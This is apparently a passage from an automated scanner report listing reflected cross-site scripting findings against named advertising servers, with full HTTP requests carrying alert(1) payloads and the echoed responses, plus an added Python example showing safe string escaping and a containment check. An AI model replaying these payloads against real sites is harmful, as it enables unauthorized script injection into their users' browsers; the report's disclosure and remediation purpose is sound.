Set-Cookie: u=6|0BEIV%2BNJTAAAAABQBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjtIPx4EjM5IAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:07 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1http://ad.agkn.com/interaction!che=441258755?imid=4271733644718820936&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5798"><script>alert(1)</script>bbf67718b2e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2e HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:06 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJSAAAAABIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fnhU7Shw8lB7AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:06 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2ehttp://ad.agkn.com/interaction!che=989082879?imid=8670815940544450683&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.13. http://ads.media.net/medianet.php [size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /medianet.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f42'%3balert(1)//acefc548551 was submitted in the size parameter. This input was echoed as 71f42';alert(1)//acefc548551 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /medianet.php?cid=7CU2PK0I5&size=300x25071f42'%3balert(1)//acefc548551&crid=712228940&ran=0.19952531741000712 HTTP/1.1
Host: ads.media.net
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 6882
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="margin: 0px; padding: 0px;">
<script language="javascript" type="text/javascript">
(function(){ var staticFrameUrl = 'http://srv.cdn-media.net/'; var requrl = '', fd = '', servingURL = 'http://search.keywordblocks.com/cmdynet?', kurl = '', cid = '7CU2PK0I5', size = '300x25071f42';alert(1)//acefc548551', crid = '712228940', widthx = '300', heighty = '25071f42';alert(1)//acefc548551';window._mN={};_mN._util={isAdProviderUrl:function(a){if(a==undefined||a==""){return false}return(_mN._sjc.providers.te
...[SNIP]...

2.14. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a17b3"%3balert(1)//1d7d4442f53 was submitted in the r parameter. This input was echoed as a17b3";alert(1)//1d7d4442f53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647a17b3"%3balert(1)//1d7d4442f53 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647a17b3";alert(1)//1d7d4442f53&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d9"-alert(1)-"b85f3aab297 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
99999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&time=2|12:45|-5&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.16. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7cb"%3balert(1)//5a34bad3e0 was submitted in the time parameter. This input was echoed as 9d7cb";alert(1)//5a34bad3e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-59d7cb"%3balert(1)//5a34bad3e0&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
usic/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-59d7cb";alert(1)//5a34bad3e0&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
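Findings 2.10 and 2.13 through 2.16 are a different sink from the attribute cases: the parameter lands inside a JavaScript string literal, so the break-out is a quote character rather than a tag, and the `%3b` in the submitted payload arrives as `;` after the server URL-decodes it. Finding 2.15 shows the variant that needs neither `;` nor `//`: `"-alert(1)-"` closes the literal, subtracts a function call and reopens it, so a filter that only strips semicolons or comment markers does not help. The Python below is an added example, not code from the report or from the ad servers. It mirrors the single-quoted medianet.php sink and the double-quoted PortalServe sink, encodes the value as a JSON string literal with `<`, `>`, `&` and the U+2028/U+2029 line terminators escaped, and checks containment by parsing the emitted literal back and comparing it with the input. The canary values, the `render_*` templates and the `size = ` anchor the checker looks for are constructed for this example.

```python
import json

# Canaries in the two shapes the report used for script-string sinks, constructed here.
SEMI_PAYLOAD = "71f42';alert(1)//acefc548551"    # close the literal, run code, comment out the rest
ARITH_PAYLOAD = 'bd5d9"-alert(1)-"b85f3aab297'   # close, subtract a call, reopen: no ';' or '//' needed


def render_vulnerable(size: str, quote: str = "'") -> str:
    """Hypothetical mirror of the sinks: raw value pasted into a quoted JS literal
    (medianet.php used single quotes, PortalServe double quotes)."""
    return f"<script>var size = {quote}{size}{quote};</script>"


def js_string_literal(value: str) -> str:
    """A JS string literal that stays a string literal whatever the input.

    json.dumps escapes the double quote and the backslash; the extra replacements keep
    '</script>' and HTML comment markers from ending the script block, and escape
    U+2028/U+2029, which older engines treat as line terminators inside a literal."""
    literal = json.dumps(value, ensure_ascii=False)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        literal = literal.replace(ch, esc)
    return literal


def render_fixed(size: str) -> str:
    """Same template, hardened: the value is emitted as a properly escaped literal."""
    return f"<script>var size = {js_string_literal(size)};</script>"


def parse_js_string(script: str, start: int):
    """Decode the JS string literal beginning at script[start] (a quote character).
    Returns (decoded_value, index_after_closing_quote); handles the \\uXXXX form and
    the single-character escapes json.dumps emits."""
    quote, i, out = script[start], start + 1, []
    simple = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}
    while i < len(script):
        c = script[i]
        if c == "\\":
            nxt = script[i + 1]
            if nxt == "u":
                out.append(chr(int(script[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append(simple.get(nxt, nxt))
                i += 2
        elif c == quote:
            return "".join(out), i + 1
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def value_is_contained(script: str, value: str) -> bool:
    """True if the literal assigned to `size` decodes back to exactly `value` and is
    followed by ';', i.e. the input never escaped the string context."""
    start = script.index("size = ") + len("size = ")
    decoded, end = parse_js_string(script, start)
    return decoded == value and script[end:end + 1] == ";"


if __name__ == "__main__":
    for payload, quote in ((SEMI_PAYLOAD, "'"), (ARITH_PAYLOAD, '"')):
        print("vulnerable contained:", value_is_contained(render_vulnerable(payload, quote), payload))
        print("fixed contained:     ", value_is_contained(render_fixed(payload), payload))
```

The round-trip check is the useful part: instead of grepping for `alert(1)`, it asks whether the literal the browser will parse still equals the value the server meant to emit. Both canary shapes fail that check against the raw-concatenation mirror and pass it against the encoded one, and the `<`/`>` escaping keeps a value of `</script>` from closing the block even though the literal itself would have been intact.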

2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c7a"><script>alert(1)</script>8352cc5bcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290665_68296156_as3105_imp|305#1315313290665_68296156_as3105_imp|374#1315258459362_65704651_as3105_imp|e2366%00%0d%0ae94350cc287#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|7e97a%00%0d%0a7815b11943f#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 2600

<!DOCTYPE html>
<!-- Impression Id: 1315313290665_68296156_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1http://adserver.teracent.net/tase/redir/1315313290665_68296156_as3105_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0LK1F-qnZuNrkHiIxSRE6EeBUdOlSCybtgzVS3aoQsH8nsP77FPnyfvBBIXH2b3up1DiXXlMDkQQAJEZ1Br4jy5PQgEhUQSyNo
...[SNIP]...

2.18. http://adserver.teracent.net/tase/ad [rcu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4ae"><script>alert(1)</script>c6801dc18e5 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290345_68345684_as3104_imp|305#1315313290345_68345684_as3104_imp|374#1315258459362_65704651_as3105_imp|f5d4d72fe77543f7c2420cd7#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|f5d4d72f11f08cc6d748514#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:09 GMT
Content-Length: 2576

<!DOCTYPE html>
<!-- Impression Id: 1315313290345_68345684_as3104_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
6.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5http://adserver.teracent.net/tase/redir/1315313290345_68345684_as3104_imp?q=H4sIAAAAAAAAAFVQu3LDMAz7FVLWM9XQjZt9XXuJP6GtnOjiUefIqZKLrG_rn5XtdemCAQQBkO_56zl6ENBZoZ0yqA3F6YeQAkRnUShJZf1PjMYxGqfGNAlANZZHo
...[SNIP]...

2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93b5d<script>alert(1)</script>db9aaf04338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
